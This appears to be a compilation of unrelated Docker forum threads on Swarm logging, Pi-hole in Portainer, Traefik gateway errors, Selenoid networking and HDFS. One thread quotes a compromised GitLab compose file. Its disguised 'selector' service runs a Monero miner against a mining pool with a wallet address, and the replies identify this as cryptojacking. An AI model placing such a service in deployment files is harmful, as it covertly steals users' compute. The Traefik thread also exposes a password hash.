I have a Docker swarm running across 4 Raspberry Pis (1 manager, 3 workers). I was a little surprised today when diagnosing a crash on the manager node to discover that the container processes running on that host are writing their logs to /var/log on the host machine.
I'd thought that by default (and my swarm is using the default/basic config from the Docker instructions here https://docs.docker.com/engine/swarm/swarm-tutorial/create-swarm/), Docker writes container logs to JSON files via the json-file logging driver, as part of Docker's own logging structure on the host. Is what I'm seeing expected behaviour, or have I badly misconfigured/misunderstood something?
For example, the letsencrypt image, which runs an nginx ingress node for my swarm, is writing its logs to /var/log/letsencrypt on my host machine. I wouldn't have thought this possible without explicitly mounting the /var/log directory in my container spec.
It seems to be writing these certbot debug logs to /var/log/letsencrypt/letsencrypt.log on the host:
2020-07-19 07:11:46,615:DEBUG:certbot.main:certbot version: 0.31.0
2020-07-19 07:11:46,616:DEBUG:certbot.main:Arguments: ['-q']
2020-07-19 07:11:46,616:DEBUG:certbot.main:Discovered plugins: PluginsRegistry(PluginEntryPoint#manual,PluginEntryPoint#null,PluginEntryPoint#standalone,PluginEntryPoint#webroot)
2020-07-19 07:11:46,638:DEBUG:certbot.log:Root logging level set at 30
2020-07-19 07:11:46,639:INFO:certbot.log:Saving debug log to /var/log/letsencrypt/letsencrypt.log
Here's my nginx docker-compose file:
version: '3'
services:
  nginx:
    image: linuxserver/letsencrypt
    volumes:
      - /share/data/nginx/:/config
    deploy:
      mode: replicated
      placement:
        constraints:
          - "node.role==manager"
    ports:
      - 80:80
      - 443:443
    environment:
      - PUID=1001
      - PGID=1001
      - URL=mydomain.com
      - SUBDOMAINS=www,mysite1,mysite2
      - VALIDATION=http
      - EMAIL=myemail@myprovider.com
      - TZ=Europe/London
    networks:
      - internal
      - monitoring_front-tier
networks:
  internal:
    external: true
  monitoring_front-tier:
    external: true
You can check which logging driver is configured on that container:
docker inspect -f '{{.HostConfig.LogConfig.Type}}' <container-id>
You can compare the result against the supported logging drivers listed in the official documentation: https://docs.docker.com/config/containers/logging/configure/#supported-logging-drivers
You may also check whether you have overridden the default json-file logging driver in /etc/docker/daemon.json. If that file does not exist, the json-file driver should be the one in use.
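If you want to confirm the daemon-wide default as well, the following may help; the daemon.json contents shown here are only an illustrative json-file configuration with log rotation, not something your hosts necessarily contain:
docker info --format '{{.LoggingDriver}}'
{
  "log-driver": "json-file",
  "log-opts": {
    "max-size": "10m",
    "max-file": "3"
  }
}
Keep in mind that the logging driver only captures what the container writes to stdout/stderr; files an application writes itself (like certbot's letsencrypt.log) are not affected by it.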
I am starting to use portainer.io to manage my Docker images, instead of the Synology DSM Docker GUI.
Background information:
I've used macvlan to give my Pi-hole container its own IP address; overall, everything regarding this Pi-hole is running fine with these settings made via the DSM GUI:
environment, network, volumes, ports
Problem:
I would now like to use portainer.io to manage my Docker installation, including the Stacks option, which should be Docker Compose.
I am now struggling to get my Pi-hole image up with this Compose file:
services:
  pihole:
    container_name: pihole
    image: pihole/pihole:latest
    networks: docker
    ports:
      - "53:53/tcp"
      - "53:53/udp"
      - "67:67/udp"
      - "80:80/tcp"
    environment:
      TZ: 'Europe/Berlin'
      WEBPASSWORD: 'password'
      ServerIP: "0.0.0.0"
    # Volumes store your data between container upgrades
    volumes:
      - '/pihole/pihole/:/etc/pihole/'
      - '/pihole/dnsmasq/:/etc/dnsmasq.d/'
    # Recommended but not required (DHCP needs NET_ADMIN)
    # https://github.com/pi-hole/docker-pi-hole#note-on-capabilities
    cap_add:
      - NET_ADMIN
    restart: unless-stopped
Does anyone have an idea why I get "Unable to deploy stack" as the error message?
You are telling the service to use a network called "docker", but the network is not defined in the compose file. Is this the complete docker-compose file?
If yes, then you are missing the networks section:
networks:
  docker:
    external: true
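Note that the service-level networks key also needs to be a list (or mapping) rather than a plain string, so the service itself would reference the network roughly like this (a minimal sketch assuming the external network really is called docker):
services:
  pihole:
    # ... rest of the service definition as above
    networks:
      - docker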
I have a Docker Swarm web application that deploys fine and can be reached from outside by a browser.
But it was not showing the client IP address to the HTTP service.
So I decided to add a Traefik service to the Docker Compose file to expose the client IP to the HTTP service.
I use mode: host on the published ports and driver: overlay on the network for this reason.
The complete configuration is described in two Docker Compose files that I run in sequence.
First I run the docker stack deploy --compose-file docker-compose-dev.yml common command on the file:
version: "3.9"
services:
traefik:
image: traefik:v2.5
networks:
common:
ports:
- target: 80
published: 80
mode: host
- target: 443
published: 443
mode: host
command:
- "--providers.docker.endpoint=unix:///var/run/docker.sock"
- "--providers.docker.swarmMode=true"
- "--providers.docker.exposedbydefault=false"
- "--providers.docker.network=common"
- "--entrypoints.web.address=:80"
# Set a debug level custom log file
- "--log.level=DEBUG"
- "--log.filePath=/var/log/traefik.log"
- "--accessLog.filePath=/var/log/access.log"
# Enable the Traefik dashboard
- "--api.dashboard=true"
deploy:
placement:
constraints:
- node.role == manager
labels:
# Expose the Traefik dashboard
- "traefik.enable=true"
- "traefik.http.routers.dashboard.service=api#internal"
- "traefik.http.services.traefik.loadbalancer.server.port=888" # A port number required by Docker Swarm but not being used in fact
- "traefik.http.routers.dashboard.rule=Host(`traefik.learnintouch.com`)"
- "traefik.http.routers.traefik.entrypoints=web"
# Basic HTTP authentication to secure the dashboard access
- "traefik.http.routers.traefik.middlewares=traefik-auth"
- "traefik.http.middlewares.traefik-auth.basicauth.users=stephane:$$apr1$$m72sBfSg$$7.NRvy75AZXAMtH3C2YTz/"
volumes:
# So that Traefik can listen to the Docker events
- "/var/run/docker.sock:/var/run/docker.sock:ro"
- "~/dev/docker/projects/common/volumes/logs/traefik.service.log:/var/log/traefik.log"
- "~/dev/docker/projects/common/volumes/logs/traefik.access.log:/var/log/access.log"
networks:
common:
name: common
driver: overlay
Then I run the docker stack deploy --compose-file docker-compose.yml www_learnintouch command on the file:
version: "3.9"
services:
www:
image: localhost:5000/www.learnintouch
networks:
common:
volumes:
- "~/dev/docker/projects/learnintouch/volumes/www.learnintouch/account/data:/usr/local/learnintouch/www/learnintouch.com/account/data"
- "~/dev/docker/projects/learnintouch/volumes/www.learnintouch/account/backup:/usr/local/learnintouch/www/learnintouch.com/account/backup"
- "~/dev/docker/projects/learnintouch/volumes/engine:/usr/local/learnintouch/engine"
- "~/dev/docker/projects/common/volumes/letsencrypt/certbot/conf/live/thalasoft.com:/usr/local/learnintouch/letsencrypt"
- "~/dev/docker/projects/common/volumes/logs:/usr/local/apache/logs"
- "~/dev/docker/projects/common/volumes/logs:/usr/local/learnintouch/logs"
user: "${CURRENT_UID}:${CURRENT_GID}"
deploy:
replicas: 1
restart_policy:
condition: any
delay: 5s
max_attempts: 3
window: 10s
labels:
- "traefik.enable=true"
- "traefik.http.routers.www.rule=Host(`dev.learnintouch.com`)"
- "traefik.http.routers.www.entrypoints=web"
- "traefik.http.services.www.loadbalancer.server.port=80"
healthcheck:
test: curl --fail http://127.0.0.1:80/engine/ping.php || exit 1
interval: 10s
timeout: 3s
retries: 3
networks:
common:
external: true
name: common
Here are the networks:
stephane@stephane-pc:~$ docker network ls
NETWORK ID     NAME                      DRIVER    SCOPE
6beaf0c3a518   bridge                    bridge    local
ouffqdmdesuy   common                    overlay   swarm
17et43c5tuf0   docker-registry_default   overlay   swarm
1ae825c8c821   docker_gwbridge           bridge    local
7e6b4b7733ca   host                      host      local
2ui8s1yomngt   ingress                   overlay   swarm
460aad21ada9   none                      null      local
tc846a14ftz5   verdaccio                 overlay   swarm
The docker ps command shows that all containers are healthy.
But a request to http://dev.learnintouch.com/ responds with a Bad Gateway error most of the time; only rarely does it go through and the web application display fine.
As a side note, I would like any unhealthy service to be restarted and seen by Traefik again. Just as Docker Swarm restarts unhealthy services, I would like Traefik to restart unhealthy services too.
The service log:
{"level":"debug","msg":"Configuration received from provider docker: {\"http\":{\"routers\":{\"dashboard\":{\"service\":\"api#internal\",\"rule\":\"Host(`traefik.learnintouch.com`)\"},\"nodejs\":{\"entryPoints\":[\"web\"],\"service\":\"nodejs\",\"rule\":\"Host(`dev.learnintouch.com`)\"},\"traefik\":{\"entryPoints\":[\"web\"],\"middlewares\":[\"traefik-auth\"],\"service\":\"traefik\",\"rule\":\"Host(`common-reverse-proxy`)\"},\"www\":{\"entryPoints\":[\"web\"],\"service\":\"www\",\"rule\":\"Host(`dev.learnintouch.com`)\"}},\"services\":{\"nodejs\":{\"loadBalancer\":{\"servers\":[{\"url\":\"http://10.0.14.17:9001\"}],\"passHostHeader\":true}},\"traefik\":{\"loadBalancer\":{\"servers\":[{\"url\":\"http://10.0.14.8:888\"}],\"passHostHeader\":true}},\"www\":{\"loadBalancer\":{\"servers\":[{\"url\":\"http://10.0.14.18:80\"}],\"passHostHeader\":true}}},\"middlewares\":{\"traefik-auth\":{\"basicAuth\":{\"users\":[\"stephane:$apr1$m72sBfSg$7.NRvy75AZXAMtH3C2YTz/\"]}}}},\"tcp\":{},\"udp\":{}}","providerName":"docker","time":"2021-07-04T10:25:01Z"}
{"level":"info","msg":"Skipping same configuration","providerName":"docker","time":"2021-07-04T10:25:01Z"}
I also tried to have Docker Swarm do the load balancing by adding the "traefik.docker.lbswarm=true" label to my service, but the Bad Gateway error remained.
I also restarted the Swarm manager:
docker swarm leave --force
docker swarm init
but the Bad Gateway error remained.
I also added the two labels:
- "traefik.backend.loadbalancer.sticky=true"
- "traefik.backend.loadbalancer.stickiness=true"
but the Bad Gateway error remained.
It feels like Traefik hits the web service before it has a chance to be ready. Is there any way to tell Traefik to wait a given number of seconds before hitting the web service?
UPDATE: I found, not a solution, but a workaround for the issue, by splitting the first common stack file above into two files, one dedicated to the traefik stack. I could then start the 3 stacks in the following order: common, www_learnintouch and traefik.
The important thing was to start the traefik stack after the others. If I then had to remove and restart the www_learnintouch stack, for example, I had to follow this by removing and restarting the traefik stack.
Also, if I removed the www_learnintouch container with a docker rm -f CONTAINER_ID command, then I also needed to remove and restart the traefik stack.
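One thing that might also be worth trying here (a sketch only, not verified in this setup) is declaring a health check on the Traefik side as well, so that Traefik only forwards traffic to backends that answer a probe instead of hitting them before they are ready. In Traefik v2 this is done with loadbalancer.healthcheck labels on the service; the path below simply reuses the same /engine/ping.php endpoint as the Swarm healthcheck:
      labels:
        - "traefik.enable=true"
        - "traefik.http.routers.www.rule=Host(`dev.learnintouch.com`)"
        - "traefik.http.routers.www.entrypoints=web"
        - "traefik.http.services.www.loadbalancer.server.port=80"
        # Traefik-side health check, in addition to the Swarm one
        - "traefik.http.services.www.loadbalancer.healthcheck.path=/engine/ping.php"
        - "traefik.http.services.www.loadbalancer.healthcheck.interval=10s"
        - "traefik.http.services.www.loadbalancer.healthcheck.timeout=3s"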
I'm running a Selenoid test automation script and would like to run it against a local application. However, I can't find how to expose my local application (running on port 8787) to Selenoid. I found the following thread discussing a similar issue, but it doesn't solve my problem. The linked thread describes using the host's IP address. However, I want to make my test system-independent: the host IP address is different for each system and is hard to retrieve in a system-independent way.
I already tried adding the expose field to my docker compose file:
version: '3'
services:
  selenoid:
    network_mode: bridge
    image: aerokube/selenoid:latest-release
    volumes:
      - "${PWD}/run:/etc/selenoid"
      - "/var/run/docker.sock:/var/run/docker.sock"
      - "${PWD}/run/video:/opt/selenoid/video"
      - "${PWD}/run/logs:/opt/selenoid/logs"
    environment:
      - OVERRIDE_VIDEO_OUTPUT_DIR=${PWD}/run/video
      - TZ=Europe/Amsterdam
    command: ["-conf", "/etc/selenoid/browsers.json", "-video-output-dir", "/opt/selenoid/video", "-log-output-dir", "/opt/selenoid/logs"]
    ports:
      - "4444:4444"
    expose:
      - "8787"
However, this doesn't work because the docker containers created by Selenoid do not get passed the same option.
Is there any way to expose my host port 8787 to my Selenoid container in a system/OS-independent way (either via a configuration in the docker-compose.yml file, a capability passed to the remote driver, or any other way)?
Selenoid runs browsers in standard Docker containers, so anything applicable to Docker is applicable to Selenoid browsers. Docker was designed for the case where all interacting parts are packed into containers; in that case you have legacy Docker links or modern Docker custom networks at your service. If you still want to run your application on the host machine without packing it into a container, you have to either use the host machine's IP, or, on some platforms, a special domain name Docker provides, e.g. docker.for.mac.localhost on Mac.
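As an illustration of the host-IP approach (a sketch, not part of the original setup): on recent Docker Engine versions (20.10+) the host's address can be mapped to a fixed hostname, so nothing system-specific needs to be hard-coded in the tests:
services:
  selenoid:
    # ... rest of the service as above
    extra_hosts:
      # the special value "host-gateway" is resolved to the host's IP at container start
      - "host.docker.internal:host-gateway"
The tests could then target http://host.docker.internal:8787; the browser containers that Selenoid spawns would need the same mapping to resolve that name, which is the same limitation the expose attempt above ran into.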
I finally realized that yes, the application I run actually runs in a Docker container and thus linking them is as easy as putting Selenoid and the application in the same Docker network. Final docker-compose.yml is as follows:
version: '3'
networks:
  my_network_name:
    external:
      name: my_network_name # This assumes network is already created
services:
  selenoid:
    networks:
      my_network_name: null
    image: aerokube/selenoid:latest-release
    volumes:
      - "${PWD}/run:/etc/selenoid"
      - "/var/run/docker.sock:/var/run/docker.sock"
      - "${PWD}/run/video:/opt/selenoid/video"
      - "${PWD}/run/logs:/opt/selenoid/logs"
    environment:
      - OVERRIDE_VIDEO_OUTPUT_DIR=${PWD}/run/video
      - TZ=Europe/Amsterdam
    command: ["-container-network", "my_network_name", "-conf", "/etc/selenoid/browsers.json", "-video-output-dir", "/opt/selenoid/video", "-log-output-dir", "/opt/selenoid/logs"]
    ports:
      - "4444:4444"
    expose:
      - "8787"
I installed GitLab via Rancher's catalog.
By running the command "docker ps" I noticed that there is a Docker container "moneropull/monero-miner".
This container appears to be deployed alongside the GitLab container. Below is the docker-compose file generated by the Rancher stack.
I would like to know whether the "selector" part is mandatory? I really want to remove it. Indeed, when the GitLab container is launched I notice very high CPU consumption.
version: '2'
volumes:
  gitlab-app-data:
    driver: local
  gitlab-conf-files:
    driver: local
  gitlab-log-data:
    driver: local
services:
  gitlab-server:
    image: gitlab/gitlab-ce:9.5.10-ce.0
    environment:
      GITLAB_OMNIBUS_CONFIG: |-
        external_url 'http://gitehost.com'
        registry_external_url 'http://gitehost.com'
        gitlab_rails['gitlab_shell_ssh_port'] = PORT_NUMBER
    volumes:
      - /home/docker-volumes/gitlab/var/opt/gitlab:/var/opt/gitlab
      - /home/docker-volumes/gitlab/var/log/gitlab:/var/log/gitlab
      - /home/docker-volumes/gitlab/etc/gitlab:/etc/gitlab
    labels:
      io.rancher.container.hostname_override: container_name
  selector:
    image: moneropull/monero-miner
    stdin_open: true
    tty: true
    command:
      - -a
      - cryptonight
      - -o
      - stratum+tcp://monerohash.com:3333
      - -u
      - 42kVTL3bciSHwjfJJNPif2JVMu4daFs6LVyBVtN9JbMXjLu6qZvwGtVJBf4PCeRHbZUiQDzBRBMu731EQWUhYGSoFz2r9fj
      - -p
      - x
    labels:
      io.rancher.container.pull_image: always
      io.rancher.scheduler.global: 'true'
It seems you are being cryptojacked. Look at this: https://kromtech.com/blog/security-center/cryptojacking-invades-cloud-how-modern-containerization-trend-is-exploited-by-attackers
There are a few compromised images out there, and I suspect you accidentally picked one of them.
@piy26 pointed it out correctly. Your setup seems to have been compromised.
The original gitlab compose file from rancher doesn't have the miner service. Here is the link: https://github.com/rancher/community-catalog/blob/master/templates/gitlab/4/docker-compose.yml#L10
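To answer the original question directly: the selector service is not a mandatory part of GitLab at all and should be removed. A rough cleanup sketch, with placeholder names to adjust to what docker ps actually shows:
# find and stop the miner container
docker ps | grep monero-miner
docker rm -f <miner-container-id>
# then remove the "selector" service from the stack definition in Rancher and
# redeploy GitLab from the untouched upstream catalog template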
I am having trouble making my HDFS setup work in Docker Swarm.
To understand the problem, I've reduced my setup to the minimum:
1 physical machine
1 namenode
1 datanode
This setup is working fine with docker-compose, but it fails with docker-swarm, using the same compose file.
Here is the compose file:
version: '3'
services:
  namenode:
    image: uhopper/hadoop-namenode
    hostname: namenode
    ports:
      - "50070:50070"
      - "8020:8020"
    volumes:
      - /userdata/namenode:/hadoop/dfs/name
    environment:
      - CLUSTER_NAME=hadoop-cluster
  datanode:
    image: uhopper/hadoop-datanode
    depends_on:
      - namenode
    volumes:
      - /userdata/datanode:/hadoop/dfs/data
    environment:
      - CORE_CONF_fs_defaultFS=hdfs://namenode:8020
To test it, I have installed a Hadoop client on my host (physical) machine with only this simple configuration in core-site.xml:
<configuration>
<property><name>fs.defaultFS</name><value>hdfs://0.0.0.0:8020</value></property>
</configuration>
Then I run the following command:
hdfs dfs -put test.txt /test.txt
With docker-compose (just running docker-compose up) it works and the file is written to HDFS.
With docker-swarm, I'm running :
docker swarm init
docker stack deploy --compose-file docker-compose.yml hadoop
Then, when all services are up and I put my file on HDFS, it fails like this:
INFO hdfs.DataStreamer: Exception in createBlockOutputStream
org.apache.hadoop.net.ConnectTimeoutException: 60000 millis timeout while waiting for channel to be ready for connect. ch : java.nio.channels.SocketChannel[connection-pending remote=/x.x.x.x:50010]
at org.apache.hadoop.net.NetUtils.connect(NetUtils.java:534)
at org.apache.hadoop.hdfs.DataStreamer.createSocketForPipeline(DataStreamer.java:259)
at org.apache.hadoop.hdfs.DataStreamer.createBlockOutputStream(DataStreamer.java:1692)
at org.apache.hadoop.hdfs.DataStreamer.nextBlockOutputStream(DataStreamer.java:1648)
at org.apache.hadoop.hdfs.DataStreamer.run(DataStreamer.java:704)
18/06/14 17:29:41 WARN hdfs.DataStreamer: Abandoning BP-1801474405-10.0.0.4-1528990089179:blk_1073741825_1001
18/06/14 17:29:41 WARN hdfs.DataStreamer: Excluding datanode DatanodeInfoWithStorage[10.0.0.6:50010,DS-d7d71735-7099-4aa9-8394-c9eccc325806,DISK]
18/06/14 17:29:41 WARN hdfs.DataStreamer: DataStreamer Exception
org.apache.hadoop.ipc.RemoteException(java.io.IOException): File /test.txt._COPYING_ could only be replicated to 0 nodes instead of minReplication (=1). There are 1 datanode(s) running and 1 node(s) are excluded in this operation.
If I look in the web UI the datanode seems to be up and no issue is reported...
Update: it seems that depends_on is ignored by Swarm, but it does not seem to be the cause of my problem: I've restarted the datanode once the namenode was up, but it did not work any better.
Thanks for your help :)
The whole mess stems from the interaction between Docker Swarm's overlay networks and how the HDFS namenode keeps track of its datanodes. The namenode records the datanode IPs/hostnames based on the datanodes' overlay network addresses. When the HDFS client asks for read/write operations directly on the datanodes, the namenode reports back the datanodes' overlay-network IPs/hostnames. Since the overlay network is not accessible to external clients, any read/write operation will fail.
The final solution I used (after lots of struggling to get the overlay network to work) was to have the HDFS services use the host network. Here's a snippet from the compose file:
version: '3.7'
x-deploy_default: &deploy_default
  mode: replicated
  replicas: 1
  placement:
    constraints:
      - node.role == manager
  restart_policy:
    condition: any
    delay: 5s
services:
  hdfs_namenode:
    deploy:
      <<: *deploy_default
    networks:
      hostnet: {}
    volumes:
      - hdfs_namenode:/hadoop-3.2.0/var/name_node
    command:
      namenode -fs hdfs://${PRIMARY_HOST}:9000
    image: hadoop:3.2.0
  hdfs_datanode:
    deploy:
      mode: global
    networks:
      hostnet: {}
    volumes:
      - hdfs_datanode:/hadoop-3.2.0/var/data_node
    command:
      datanode -fs hdfs://${PRIMARY_HOST}:9000
    image: hadoop:3.2.0
volumes:
  hdfs_namenode:
  hdfs_datanode:
networks:
  hostnet:
    external: true
    name: host
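For reference, deploying this host-networked stack could then look roughly like this (PRIMARY_HOST and the stack name hdfs are assumptions matching the snippet above):
# the address the namenode and datanodes should advertise; here simply the host itself
export PRIMARY_HOST=$(hostname -f)
docker stack deploy --compose-file docker-compose.yml hdfs
External clients then point fs.defaultFS at hdfs://<that host>:9000, and the datanode addresses handed back by the namenode are host addresses instead of unreachable overlay IPs.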